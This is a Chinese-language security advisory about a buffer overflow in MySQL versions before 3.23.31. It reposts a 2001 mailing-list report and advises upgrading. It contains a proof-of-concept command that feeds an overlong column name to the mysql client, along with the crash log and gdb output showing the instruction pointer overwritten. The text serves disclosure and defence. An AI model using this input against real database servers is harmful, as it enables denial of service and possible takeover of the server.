MySQL3.23.31之前版本的安全漏洞

发布时间:2007年02月24日      浏览次数:859 次
所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。
下面为最初发表于 MySQL 邮件列表的信件摘要。
==================================================
漏洞是由Jo?o Gouveia 于1月12日发现的:
步骤:
在第一个终端上启动 mysql:
spike:/var/mysql # /sbin/init.d/mysql start
在另外一个终端上输入:
jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’
Enter password:
(没有反应?按^C退出)
在第一台终端上会显示:
spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
nohup
$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
g "$@" >>$err_log 2>&1>
Number of processes running now: 0
mysqld restarted on Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended
使用 gdb 显示结果如下:
(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
其中的 eip 指示就是缓冲溢出了。
解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。
免责声明:本站相关技术文章信息部分来自网络,目的主要是传播更多信息,如果您认为本站的某些信息侵犯了您的版权,请与我们联系,我们会即时妥善的处理,谢谢合作!